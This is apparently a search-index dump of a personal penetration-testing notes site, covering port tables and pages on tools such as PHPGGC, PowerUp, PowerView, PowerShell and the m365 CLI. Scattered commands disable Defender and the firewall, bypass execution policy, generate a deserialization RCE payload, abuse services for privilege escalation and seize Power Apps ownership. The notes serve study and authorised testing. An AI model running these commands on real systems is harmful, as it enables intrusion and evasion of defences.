    ","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#tcp","title":"TCP","text":"Protocol Acronym Port Description Tools File Transfer Protocol FTP20-21 Used to transfer files ftp, lftp , ncftp, filezilla, crossftp Secure Shell SSH22 Secure remote login service Telnet Telnet23 Remote login service Simple Network Management Protocol SNMP161-162 Manage network devices Hyper Text Transfer Protocol HTTP80 Used to transfer webpages Hyper Text Transfer Protocol Secure HTTPS443 Used to transfer secure webpages Domain Name System DNS53 Lookup domain names Trivial File Transfer Protocol TFTP69 Used to transfer files Network Time Protocol NTP123 Synchronize computer clocks Simple Mail Transfer Protocol SMTP25 Used for email transfer Thunderbird, Claws, Geary, MailSpring, mutt, mailutils, sendEmail, swaks, sendmail. Post Office Protocol POP3110 Used to retrieve emails Internet Message Access Protocol IMAP143 Used to access emails Server Message Block SMB445 Used to transfer files Samba Suite, smbclient, crackmapexec, SMBMap, smbexec.py, psexec.py, Impacket Network File System NFS111, 2049 Used to mount remote systems Bootstrap Protocol BOOTP67, 68 Used to bootstrap computers Kerberos Kerberos88 Used for authentication and authorization Lightweight Directory Access Protocol LDAP389 Used for directory services Remote Authentication Dial-In User Service RADIUS1812, 1813 Used for authentication and authorization Dynamic Host Configuration Protocol DHCP67, 68 Used to configure IP addresses Remote Desktop Protocol RDP3389 Used for remote desktop access Network News Transfer Protocol NNTP119 Used to access newsgroups Remote Procedure Call RPC135, 137-139 Used to call remote procedures Identification Protocol Ident113 Used to identify user processes Internet Control Message Protocol ICMP0-255 Used to troubleshoot network issues Internet Group Management Protocol IGMP0-255 Used for multicasting Oracle DB (Default/Alternative) Listener oracle-tns1521/1526 The Oracle database default/alternative listener is a service that runs on the database host and receives requests from Oracle clients. Ingres Lock ingreslock1524 Ingres database is commonly used for large commercial applications and as a backdoor that can execute commands remotely via RPC. Squid Web Proxy http-proxy3128 Squid web proxy is a caching and forwarding HTTP web proxy used to speed up a web server by caching repeated requests. Secure Copy Protocol SCP22 Securely copy files between systems Session Initiation Protocol SIP5060 Used for VoIP sessions Simple Object Access Protocol SOAP80, 443 Used for web services Secure Socket Layer SSL443 Securely transfer files TCP Wrappers TCPW113 Used for access control Network Time Protocol NTP123 Synchronize computer clocks Internet Security Association and Key Management Protocol ISAKMP500 Used for VPN connections Microsoft SQL Server ms-sql-s1433 Used for client connections to the Microsoft SQL Server. mssql-cli, mssqlclient.py, dbeaver Kerberized Internet Negotiation of Keys KINK892 Used for authentication and authorization Open Shortest Path First OSPF520 Used for routing Point-to-Point Tunneling Protocol PPTP1723 Is used to create VPNs Remote Execution REXEC512 This protocol is used to execute commands on remote computers and send the output of commands back to the local computer. Remote Login RLOGIN513 This protocol starts an interactive shell session on a remote computer. X Window System X116000 It is a computer software system and network protocol that provides a graphical user interface (GUI) for networked computers. Relational Database Management System DB250000 RDBMS is designed to store, retrieve and manage data in a structured format for enterprise applications such as financial systems, customer relationship management (CRM) systems.","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#udp","title":"UDP","text":"Protocol Acronym Port Description Domain Name System DNS53 It is a protocol to resolve domain names to IP addresses. Trivial File Transfer Protocol TFTP69 It is used to transfer files between systems. Network Time Protocol NTP123 It synchronizes computer clocks in a network. Simple Network Management Protocol SNMP161 It monitors and manages network devices remotely. Routing Information Protocol RIP520 It is used to exchange routing information between routers. Internet Key Exchange IKE500 Internet Key Exchange Bootstrap Protocol BOOTP68 It is used to bootstrap hosts in a network. Dynamic Host Configuration Protocol DHCP67 It is used to assign IP addresses to devices in a network dynamically. Telnet TELNET23 It is a text-based remote access communication protocol. MySQL MySQL3306 It is an open-source database management system. Terminal Server TS3389 It is a remote access protocol used for Microsoft Windows Terminal Services by default. NetBIOS Name netbios-ns137 It is used in Windows operating systems to resolve NetBIOS names to IP addresses on a LAN. Microsoft SQL Server ms-sql-m1434 Used for the Microsoft SQL Server Browser service. Universal Plug and Play UPnP1900 It is a protocol for devices to discover each other on the network and communicate. PostgreSQL PGSQL5432 It is an object-relational database management system. Virtual Network Computing VNC5900 It is a graphical desktop sharing system. X Window System X116000-6063 It is a computer software system and network protocol that provides GUI on Unix-like systems. Syslog SYSLOG514 It is a standard protocol to collect and store log messages on a computer system. Internet Relay Chat IRC194 It is a real-time Internet text messaging (chat) or synchronous communication protocol. OpenPGP OpenPGP11371 It is a protocol for encrypting and signing data and communications. Internet Protocol Security IPsec500 IPsec is also a protocol that provides secure, encrypted communication. It is commonly used in VPNs to create a secure tunnel between two devices. Internet Key Exchange IKE11371 It is a protocol for encrypting and signing data and communications. X Display Manager Control Protocol XDMCP177 XDMCP is a network protocol that allows a user to remotely log in to a computer running the X11.","tags":["ports","services","network services"]},{"location":"pesecurity/","title":"PESecurity - A powershell script to check windows binaries compilations","text":"

    PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.

    "},{"location":"pesecurity/#installation","title":"Installation","text":"

    Download from: https://github.com/NetSPI/PESecurity.

    "},{"location":"pesecurity/#usage","title":"Usage","text":"
    # To execute Get-PESecurity, first import the module\nImport-Module .\\Get-PESecurity.psm1\n\n# Check a single file\nGet-PESecurity -file C:\\Windows\\System32\\kernel32.dll\n\n# Check a directory for DLLs & EXEs\nGet-PESecurity -directory C:\\Windows\\System32\\\n\n# Check a directory for DLLs & EXEs recrusively\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive\n\n# Export results as a CSV\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Export-CSV file.csv\n\n# Show results in a table\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table\n\n# Show results in a table and sort by a column\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table | sort ASLR\n
    "},{"location":"phpggc/","title":"Phpggc - A tool for PHP deserialization","text":"

    PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

    It can be seen as the equivalent of frohoff's ysoserial, but for PHP.

    Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

    ","tags":["webpentesting","tools","deserialization","php"]},{"location":"phpggc/#installation","title":"Installation","text":"

    Repository: https://github.com/ambionics/phpggc

    Clone it:

    git clone https://github.com/ambionics/phpggc.git\n

    List available gadget chains:

    cd phpggc\n\n./phpggc -l\n

    Example from Burpsuite lab:

    /phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n
    ","tags":["webpentesting","tools","deserialization","php"]},{"location":"ping/","title":"Ping","text":"

    ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive.

    ping www.example.com\nping 8.8.8.8\n

    Ping sweeping tools automatically perform the same operation to every host in a subnet or IP range.

    ","tags":["scanning","reconnaissance"]},{"location":"postfix/","title":"postfix - A SMTP server","text":"","tags":["linux","tool","SMTP","SMTP server"]},{"location":"postfix/#local-installation","title":"Local installation","text":"
    sudo apt update\n\nsudo apt install mailutils\n# At the end of the installation a pop up will prompt you about the general type of mail configuration. Pick \"Internet site\". If not prompted, run this to execute it:\nsudo dpkg-reconfigure postfix\n# System mail name must coincide with the  server's name you provided before.\n

    To edit the configuration of the service:

    sudo nano /etc/postfix/main.cf\n

    More on https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-postfix-as-a-send-only-smtp-server-on-ubuntu-18-04-es.

    ","tags":["linux","tool","SMTP","SMTP server"]},{"location":"powerapps-pentesting/","title":"Pentesting PowerApps","text":"

    Sources from these notes

    Power Apps - Complete Guide to Microsoft PowerApps

    Powerapp falls into the category of a No-code/Low-code solution. PowerApps is the Microsoft solution for developing applications (app is built in a powerapp environment that takes care of everything needed for your code to be run everywhere).

    PowerApp enables your application to connect to anything and have a great deal of customizing features.

    Power Apps developed in the Power Platform environment and published for use by internal and external users are often critical to the organization.

    They enable key business processes, leverage and interface with highly sensitive business data and integrate with multiple data source and applications, consequently becoming the gateway from the cloud to the most sensitive business applications of the organization.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#basics-on-powerapps","title":"Basics on PowerApps","text":"

    Power Apps is a collection of services, apps, and connectors that work together to let you do much more than just view your data. You can act on your data and update it anywhere and from any device.

    Power Apps Home Page: If you are building an app, you'll start with the Power Apps Home Page. You can build apps from sample apps, templates, or a blank screen.

    Power Apps Studio: Power Apps Studio is where you can fully develop your apps to make them more effective as a business tool and to make them more attractive:

    • Left pane - Shows a hierarchical view of all the controls on each screen or a thumbnail for each screen in your app.
    • Middle pane - Shows the canvas app that you're working on.
    • Right pane - Where you set options such as the layout, properties, and data sources for certain controls.

    Microsoft Power Platform admin center: Microsoft Power Platform admin center is the centralized place for managing Power Apps for an organization. On this site, you can define and manage different environments to house the apps. For example, you might have separate environments for development and production apps. Additionally, you can define data connections and manage environment roles and data policies.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#simple-data-application","title":"Simple data application","text":"

    You just need to connect a spreadsheet with a table. What you connect is the table. PowerApps synchronizes your application by adding an id column to the table in your spreadsheet.

    Your new app will have three components:

    • Listing page screen.
    • Details screen
    • CRUE operations on records: Edit record, Add new record, Delete record.

    Each item/record corresponds with a row from your connected spreadsheet. Galleru is a representation of a list of records that's pulling from a connected table.

    Saving the application: by default Microsoft will safe your app, but for that to happen you first need it to save it for the first time.

    Tree view displays all the screen of your application. Under the screen level you have the elements that compose your screen. Elements can have sub elements.

    Properties

    Elements have properties. Properties can be set statically or dynamically. Dynamically set properties open the door for users updating values or things like resizing elements based on height, for instance.

    # This references to the connected spreadsheet column name\nThisItem.HeadingColumnName \n\n#  This will reference to the value inserted in that element.\nNameofElement.Default \n

    Additionally, you have formatting functions, like for instance the Text function, that can be applied to a property (dynamically or statically established).

    # Format element to mm/dd/yyyy \nText(ThisItem.HeadingColumnName, \"mm/dd/yyyy\" )\n\n# Concatenate elements \nConcatenate (ThisItem.HeadingColumnName, ThisItem.HeadingColumnName2)\n# For instance:  Concatenate (ThisItem.FirsName, ThisItem.LastName)\n\nConcatenate (NameofElement.Default,  NameofElement2.Default)  \n# For instance: Concatenate (First_Name_Card.Default, Last_Name_Card.Default)  \n

    A data card has a property called UPDATE. This is useful in forms or user input, in which what you finally submit to the database is not their input but the result of that input after the UPDATE transformation has taken place.

    Basically what happens is when you click the check mark, what it's basically doing is it's using the update property of each of the data cards here, and actually submitting it to the underlying data itself.

    More properties:

    • DisplayMode. This can be set to View, Edit... You can granularly set the property of an element to View (so no edition is possible). Or you can set that property for their parent.

    Triggers

    Elements have properties and triggers. Triggers is an action that an user perform on an element. They are quite similar to those actions called in javascript (onload, onselect,...).

    Configuring a triggers: you basically select an element (button), set the action you want (onclick) and the function you want to assign it (submit). You can separate actions with \";\".

    Triggers help you build the functionality of your application. For instance, in this basic app, navigation from one screen to another is actioned with a Navigate trigger. Or, for instance, starting the application is a trigger itself.

    Formulas and functions

    Formula Reference for PowerApps

    Canvas application

    Building an application from scratch.

    A common practice, to have a master screen and a document screen: First thing you do is creating a master screen that will be used as a template for the rest of your screens in your application. The second thing you will do is creating a screen named Documentation. Master screen will be to create elements in your app. Documentation will be for assigning style to those elements. Master screen elements will reference Document screen.

    Variables in Powerapps are different from variables in programmed languages. There 3 types:

    • Contextual variables: Variables is only active when you are on the screen.
    • Global variables: they are accessible from all screens in the application.
    • Collection variables.

    How to set up a contextual variable. Select an element in the screen. Select \"OnSelect\" and add the function:

    UpdateContext({FirstNumber: TextInput.Text})\n# When you select an element, for instance an input field, it will create a variable called FirstNumber and it will assign it the value of the input field that you have selected\n

    How to set up a global variable. By using the SET function

    Set(CounterGlobal, CounterGlobal+1)\n

    Collections variable are useful for datatables and galleries.

    Example. Create a button and OnSelect that button add this function:

    Collect(OurCollection, {First: \"Ben\", Second: \"Dover\"})\n# that it's creating a collection called our collection. It's creating two columns in that. The first column is called first. The second column is called second. And the first record in the first column is Ben, and the first record in the second column is called Dover.\n

    Create a Gallery, and as Data source, add your collection. This way everytime you click on that button you will be adding \"Ben\" and \"Dover\" as a card to that gallery. Of course you can substitute those two static texts to references to inputs fields:

    Collect(OurCollection, {First: \"TextInput4.Text\", Second: \"TextInput5.Text\"})\n

    To remove an item from a collection, add a icon-button for removing and onSelect:

    Remove(OurCollection, ThisItem)\n

    Filtering cards displayed in a gallery. Select the Gallery, onSelect:

    Search(NameOfTable, <ElementToSearch>, <WhichColumnsSearchinTable>)\n\n# For example, to display all cards in connected table \"Table1\":\nSearch(Table1, \"\", \"FirstName\")\n\n# To make it dependable on user's input, create an input field and\nSearch(Table1, TexInput1.Text, \"FirstName\", \"LastName\", \"Location\")\n

    Only show the search input if someone click on the search icon.

    • Set the Input search box default visibility to False.
    • Insert a magnifier icon. OnSelect:

      UpdateContext({SearchVisible: True})\n
    • Modify the search input field. When Visible:

      SearchVisible\n

    To trigger SearchVisible to false (and hide search input field), we will modify the magnifier icon, onSelect:

    ```\nUpdateContext({SearchVisible: !SearchVisible})\n```\n

    More interesting formulas is Filter

    # An example of a multi-layered built function, with Filter and Search functionality. Create a dropdown menu > Items\nFilter(Search(Table1, TexInput1.Text, \"FirstName\", \"LastName\", \"Location\"), VIPLevel = Dropdown.Selected.Value)\n

    And also SubmitForm, which aggregates all the updates in a form control and submits the form.

    SubmitForm(FormName)\n
    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#well-known-vulnerabilities-under-build","title":"Well-known vulnerabilities (under build)","text":"","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#data-exposure","title":"Data exposure","text":"

    https://rencore.com/en/blog/how-to-prevent-the-next-microsoft-power-apps-data-leak-from-happening

    From https://dev.to/wyattdave/ive-just-been-hacked-by-a-power-app-1fj4

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#not-using-service-accounts","title":"Not using Service accounts","text":"

    The security issue is all around how the Power Platform handles credentials, with each user/owner signing in and storing their credentials in connections. Meaning that if you share a flow created with your user, your are sharing your connections (aka credentials).

    One way to prevent this issue is by using service accounts.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#sharing-flows","title":"Sharing flows","text":"

    If you need to share a flow:

    • Use send a copy or
    • share a flow as a run only user (as that requires their credentials).
    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#configuring-connections-to-the-least-privilege","title":"Configuring connections to the least privilege","text":"

    When configuring a flow, don't include additional unnecessary connections in any flow. As per Powerapps works, this situation may happen:

    A connection set to the highest privilege (you share read calendar and you give write access to emails).

    A wa This has its strengths, as all credentials are securely stored and accessing apps/ running flows is easy as the Power Platform handles everything. The problem comes when you share flows, as what you might not realise is you are sharing your connections (aka credentials) with that user. They may not be able to see your credentials, but that doesn't mean they cant use them in a way that you didn't want. And what's worse is there is no granularity in connections, so an Outlook connection used for reading events can be used to delete emails.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#protecting-powerapps-with-microsoft-sentinel","title":"Protecting PowerApps with Microsoft Sentinel","text":"

    As Power Platform is part of the Microsoft offering, Microsoft Sentinel adresses many security issues:

    • Collect\u00a0Microsoft Power Platform and Power Apps activity logs, audits, and events into the Microsoft Sentinel workspace.
    • Detect\u00a0execution of suspicious, malicious, or illegitimate activities within Microsoft Power Platform and Power Apps.
    • Investigate\u00a0threats detected in Microsoft Power Platform and Power Apps and contextualize them with additional user activities across the organization.
    • Respond\u00a0to Microsoft Power Platform-related and Power Apps-related threats and incidents in a simple and canned manner manually, automatically, or via a predefined workflow.

    Data connectors for Microsoft Sentinels

    Connector Name Covered Logs / Inventory Power Platform Inventory (using Azure Functions) Power Apps and Power Automate inventory data Microsoft Power Apps (Preview) Power Apps activity logs Microsoft Power Automate (Preview) Power Automate activity logs Microsoft Power Platform Connectors (Preview) Power Platform connector activity logs Microsoft Power Platform DLP (Preview) Data loss prevention activity logs Dynamics365 Dataverse and model-driven apps activity logging

    Sentinel rules for protecting PowerApps platform:

    Rule name What does it detect? PowerApps - App activity from unauthorized geo Identifies Power Apps activity from countries in a predefined list of unauthorized countries. PowerApps - Multiple apps deleted Identifies mass delete activity where multiple Power Apps are deleted within a period of 1 hour, matching a predefined threshold of total apps deleted or app deletes events across multiple Power Platform environments. PowerApps - Data destruction following publishing of a new app Identifies a chain of events where a new app is created or published, that is followed by mass update or delete events in Dataverse within 1 hour. The incident severity is raised if the app publisher is on the list of users in the TerminatedEmployees watchlist template. PowerApps - Multiple users accessing a malicious link after launching new app Identifies a chain of events, where a new Power App is created, followed by multiple users launching the app within the detection window and clicking on the same malicious URL. PowerAutomate - Departing employee flow activity Identifies instances where an employee who has been notified or is already terminated creates or modifies a Power Automate flow. PowerPlatform - Connector added to a Sensitive Environment Identifies occurrences of new API connector creations within Power Platform, specifically targeting a predefined list of sensitive environments. PowerPlatform - DLP policy updated or removed Identifies changes to DLP policy, specifically policies which are updated or removed.","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#attacks","title":"Attacks","text":"

    Install m365 CLI.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#ennumeration-techniques","title":"Ennumeration techniques","text":"

    Get information about the default Power Apps environment.

    m365 pa environment get  \n

    List Microsoft Power Apps environments in the current tenant

    m365 pa environment list \n

    List all available apps for that user

    m365 pa app list  \n

    List all apps in an environment as Admin

    m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Remove an app

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

    Removes the specified Power App without confirmation

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

    Removes the specified Power App you don't own

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default- 00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Add an owner without removing the old one

    m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

    Export an app

    m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
    ","tags":["database","cheat","sheet"]},{"location":"powercat/","title":"Powercat - An alternative to netcat coded in PowerShell","text":"

    Netcat comes pre-installed in most Linux distributions. There is also a version for windows: download from https://nmap.org/download.html.

    As for Windows machines, there's an alternative to netcat coded in PowerShell called PowerCat.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"powershell/","title":"Powershell","text":""},{"location":"powershell/#basic-commands","title":"Basic commands","text":"
    # List users of Administrator group\nnet localgroup Administrators\n\n\n\n# List contents\ndir\nGet-ChildItem -Force\n# -Force: Display hidden files \n\n\n# Print working directory\npwd\nGet-Location\n\n# Change directory\ncd\ncd ..           // it gets you up one level\ncd ..\\brotherdirectory  // go to a brother directory\ncd ~\\Desktop        // go to logged user's Desktop\n\n# Creates folder\nmkdir nameOfFolder\nNew-Item -ItemType Directory nameOfDirectory\n\n# Display all commands saved in a file\nhistory\nGet-history\n\n# Browse the command history\nCTRL-R\n\n# Clear screen\nclear\nClear-Host\n\n# Copy item\ncp nameOfSource nameOfDestiny\nCopy-Item nameOfSource nameOfDestiny\n\n# Copy a folder and its content\ncp originFolder destinyPath -Recurse\nCopy-Item originFolder destinyPath -Recurse\n\n# Get running processes filtered by name\nget-process -name ccSvcHst\n\n# Kill processes called ccSvcHst* // Notice here wild card *\ntaskkill /f /im ccSvcHst*\n\n# Remove a file\nrm nameofFile -Recurse\n# -Recurse: Remove it recursively (in a folder)\n\n# Display content of a file\ncat nameofFile\nGet-Content nameofFile\n\n# Display one page of a file at a time\nmore nameofFile\n\n# Display the first lines of a file\nhead nameofFile\n\n# Open a file with an app\nstart nameofApp nameofFile\n\n# Runs commands or expressions on the local computer.\n$Command = \"Get-Process\"\nInvoke-Expression $Command\n\n# PS uses Invoke-Expression to evaluate the string. Otherwise the output of $Command would be the text \"Get-Process\". Invoke-Expression is similar to $($command) in linux.\n# IEX is an alias\n\n# Deactivate antivirus from powershell session (if user has rights to do so)\nSet-MpPreference -DisableRealtimeMonitoring $true\n\n# Disable firewall\nnetsh advfirewall set allprofiles state off\n\n\n# Add a registry\nreg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n
    "},{"location":"powershell/#powershell-wildcards","title":"Powershell wildcards","text":"

    The four types of Wildcard:

    The * wildcard will match zero or more characters

    The ? wildcard will match a single character

    [m-n] Match a range of characters from m to n, so [f-m]ake will match fake/jake/make

    [abc] Match a set of characters a,b,c.., so [fm]ake will match fake/make

    "},{"location":"powershell/#filters","title":"Filters","text":"

    Filters are a way to power up our queries in powershell.

    Example: We can use the Filter parameter with the notlike operator to filter out all Microsoft software (which may be useful when enumerating a system for local privilege escalation vectors).

    get-ciminstance win32_product -Filter \"NOT Vendor like '%Microsoft%'\" | fl\n

    The Filter operator requires at least one operator:

    Filter Meaning -eq Equal to -le Less than or equal to -ge Greater than or equal to -ne Not equal to -lt Less than -gt Greater than -approx -bor Bitwise OR -band Bitwise AND -recursivematch Recursive match -like Like -notlike Not like -and Boolean AND -or Boolean OR -not Boolean NOT"},{"location":"powershell/#filter-examples-ad-object-properties","title":"Filter Examples: AD Object Properties","text":"

    The filter can be used with operators to compare, exclude, search for, etc., a variety of AD object properties. Filters can be wrapped in curly braces, single quotes, parentheses, or double-quotes. For example, the following simple search filter using Get-ADUser to find information about the user \"Sally Jones\" can be written as follows:

    Get-ADUser Filter \"name -eq 'sally jones'\"\nGet-ADUser -Filter {name -eq 'sally jones'}\nGet-ADUser -Filter 'name -eq \"sally jones\"'\n

    As seen above, the property value (here, sally jones) can be wrapped in single or double-quotes.

    # The asterisk (`*`) can be used as a wildcard when performing queries. \nGet-ADUser -filter {-name -like \"joe*\"}\n# it return all domain users whose name start with `joe` (joe, joel, etc.).\n
    "},{"location":"powershell/#escaping-characters","title":"Escaping characters","text":"

    When using filters, certain characters must be escaped:

    Character Escaped As Note \u201c `\u201d Only needed if the data is enclosed in double-quotes. \u2018 \\\u2019 Only needed if the data is enclosed in single quotes. NULL \\00 Standard LDAP escape sequence. \\ \\5c Standard LDAP escape sequence. * \\2a Escaped automatically, but only in -eq and -ne comparisons. Use -like and - notlike operators for wildcard comparison. ( /28 Escaped automatically. ) /29 Escaped automatically. / /2f Escaped automatically."},{"location":"powershell/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"
    # Display Powershell relevant Powershell version information\necho $PSVersion\n\n# Check current execution policy. If the answer is\n# - \"Restricted\": Ps scripts cannot run.\n# - \"RemoteSigned\": Downloaded scripts will require the script to be signed by a trusted publisher.\nGet-Execution-Policy\n\n# Bypass execution policy\npowershell -ep bypass\n\n#You can tell if PowerShell is running with administrator privileges (a.k.a \u201celevated\u201d rights) with the following snippet:\n[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'\n# [Security.Principal.WindowsIdentity]::GetCurrent() - Retrieves the WindowsIdentity for the currently running user.\n# (...).groups - Access the groups property of the identity to find out what user groups the identity is a member of.\n# -contains \"S-1-5-32-544\" returns true if groups contains the Well Known SID of the Administrators group (the identity will only contain it if \u201crun as administrator\u201d was used) and otherwise false.\n\n\n# List which processes are elevated:\nGet-Process | Add-Member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated\n\n# List installed software on a computer\nget-ciminstance win32_product | fl\n\n\n# Gets content from a web page on the internet.\nInvoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# alias: `iwr`, `curl`, and `wget`\n
    "},{"location":"powershell/#disk-management","title":"Disk Management","text":"
    # Show disks\nGet-Disk\n\n# Show disks in a more humanly mode\nGet-disk | FT -AutoSize\n\n# Show partitions from a disk\nGet-Partition -DiskNumber 1\n\n# Create partition\nNew-Partition -DiskNumber 1 -Size 50GB -AssignDriveLetter\n\n# Show volume\nGet-volume -DriveLetter e\n\n# Format Disk and assign file system\nFormat-volume -DriveLetter E -FileSystem NTFS\n\n# Delete Partition \nRemove-Partition -DriveLetter E\n
    "},{"location":"powershell/#disk-management-with-diskpart","title":"Disk Management with diskpart","text":"

    Diskpart is a command interpreter that helps you manage your computer's drivers. How it works? Before using diskpart commands, you usually have to list and select the object you want to operate on.

    # To enter in diskpart command interpreter\ndiskpart\n\n# Enumerate disk\nlist disk\n\n# Select disk\nselect disk 0\n\n# Enumerate volumes\nlist volume\n\n# Select volume\nselect volume 1\n\n# Enumerate partitions\nlist partition\n\n# Select partition\nselect partition 2\n\n# Extend a volume (once you have it selected)\nextend size=2048\n\n# Shring a volume (once you have it selected)\nshrink desired=2048\n
    "},{"location":"powershell/#howtos","title":"Howtos","text":""},{"location":"powershell/#how-to-delete-shortcuts-from-public-desktop","title":"How to delete shortcuts from Public Desktop","text":"
    # Instead of \"everyone\" set the group that you prefer\n$acl = Get-ACL \u201cC:\\Users\\Public\\Desktop\u201d\n\n$rule=new-object System.Security.AccessControl.FileSystemAccessRule (\u201ceveryone\u201d,\u201dFullControl\u201d, \u201cContainerInherit,ObjectInherit\u201d, \u201cNone\u201d, \u201cAllow\u201d)\n\n$acl.SetAccessRule($rule)\n\nSet-ACL \u201cC:\\Users\\Public\\Desktop\u201d $acl\n
    "},{"location":"powershell/#how-to-uninstall-winzip-from-powershell-line-of-command","title":"How to uninstall winzip from powershell line of command","text":"
    # Show all software installed:\nGet-WmiObject\u00a0-Class\u00a0win32_product\n\n# Find winzip object\nGet-WmiObject\u00a0-Class\u00a0win32_product |\u00a0where\u00a0{\u00a0$_.Name\u00a0-like\u00a0\"*Winzip*\"}\n\n# Create a variable for  the object\n$wzip\u00a0=\u00a0Get-WmiObject\u00a0-Class\u00a0win32_product |\u00a0where\u00a0{\u00a0$_.Name\u00a0-like\u00a0\"*Winzip*\"}\n\n# Uninstall it:\nmsiexec /x\u00a0\u00a0$wzip.localpackage /passive\n

    This will start un-installation of Winzip and will show only the Progress bar only {because we are using msiexex\u2019s /passive switch\u201d

    "},{"location":"powerup/","title":"PowerUp.ps1","text":"

    Run from powershell.

    ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#installation","title":"Installation","text":"

    Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

    Import-Module .\\PowerUp.ps1\n
    ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#basic-commands","title":"Basic commands","text":"
    # Find services vulnerables in my machine\nInvoke-AllChecks\n\n# Exploit a vulnerable service to escalate to the more privilege user that runs that service\nInvoke-ServiceAbuse -Name \u2018<NAME OF THE SERVICE>\u2019 -UserName \u2018<DOMAIN CONTROLLER>\\<MY CURRENT USERNAME>\u2019\n
    ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerview/","title":"powerview.ps1","text":"
    ---\n

    title: Powerview.ps1 author: amandaguglieri draft: false TableOfContents: true tags: - active directory - ldap - windows - enumeration - reconnaissance - tools

    "},{"location":"powerview/#powerviewps1","title":"Powerview.ps1","text":"

    Run from powershell.

    Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

    Import-Module .\\Powerview.ps1\u00a0\n
    "},{"location":"powerview/#enumeration-cheat-sheet","title":"Enumeration cheat sheet","text":"
    # Enumerate users\nGet-NetUser\n\n# Enumerate computers in the domain\nGet-NetComputer \nGet-NetComputer | select name\nGet-NetComputer -OperatingSystem \"Linux\"\n\n# Display info of current domain. Pay attention to the element forest, to see if there is a bigger structure\nGet-NetDomain\n\n# Get the ID for the current Domain (useful later for crafting Golden tickets)\nGet-DomainID\n\n# Display policies for the Domain and accounts, including for instance LockoutBadAccounts\nGet-DomainPolicy\n\n# Display Domain controller\nGet-NetDomainController\n\n# List users in the domain. Useful to search for non expiring passwords, groups belonging, what's their SPN, last time they changed their password... \nGet Net-User\nGet Net-User john.doe\n\n# List users associated to an Service Principal Name (SPN) \nGet Net-User -SPN\n\n# List groups in the domain\nGet-NetGroup\n\n# List Group Policy Objects in domain\nGet-NetGPO\n\n# List Domain Trusts\nGet-NetDomainTrust\n
    "},{"location":"process-capabilities-getcap/","title":"Process capabilities: getcap","text":"

    Linux capabilities provide a subset of the available root privileges to a process. For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).

    In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this \u2018permission\u2019 without having it run with complete root privileges. This allows for a more secure system in general.

    getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on debian and debian-based distributions.

    Scan all files in system and check capabilities:

    getcap -r / 2>/dev/null\n

    Check what every capability means in https://linux.die.net/man/7/capabilities

    Knowing what capability is assigned to a proccess, try to make the best of it to escalate privileges.

    Example in HackTheBox: nunchucks in which perl command has \" cap_setuid+ep\" capabilities, which means that at some point may run as sudo.

    ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#labs","title":"Labs","text":"

    HackTheBox: nunchucks

    ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#resources","title":"Resources","text":"

    Hacktricks

